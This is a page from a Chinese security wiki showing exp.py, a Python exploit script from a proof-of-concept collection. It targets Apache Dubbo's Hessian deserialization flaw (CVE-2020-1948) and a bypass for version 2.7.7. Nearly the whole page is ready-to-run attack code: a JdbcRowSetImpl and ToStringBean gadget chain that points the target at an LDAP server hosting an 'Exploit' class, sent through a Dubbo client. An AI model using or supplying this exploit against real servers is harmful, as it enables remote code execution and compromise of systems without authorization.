menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Some-PoC-oR-ExP-master chevron_right dubbo chevron_right exp.py
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    exp.py
    992 B / 2021-07-04 19:32:24
        from dubbo.codec.hessian2 import Decoder,new_object
from dubbo.client import DubboClient
import sys

client = DubboClient('127.0.0.1', int(sys.argv[1]))

JdbcRowSetImpl=new_object(
      'com.sun.rowset.JdbcRowSetImpl',
      dataSource="ldap://127.0.0.1:1389/Exploit",
      strMatchColumns=["foo"]
      )
JdbcRowSetImplClass=new_object(
      'java.lang.Class',
      name="com.sun.rowset.JdbcRowSetImpl",
      )
toStringBean=new_object(
      'com.rometools.rome.feed.impl.ToStringBean',
      beanClass=JdbcRowSetImplClass,
      obj=JdbcRowSetImpl
      )
# POC 1 CVE-2020-1948
# resp = client.send_request_and_return_response(
#     service_name='org.apache.dubbo.spring.boot.demo.consumer.DemoService',
#     method_name='rce',
#     args=[toStringBean])
# 2.7.7 bypass
resp = client.send_request_and_return_response(
    service_name='org.apache.dubbo.spring.boot.sample.consumer.DemoService',
    method_name=[toStringBean],
    service_version='1.0.0',
    args=[])


print(resp)
    links
    file_download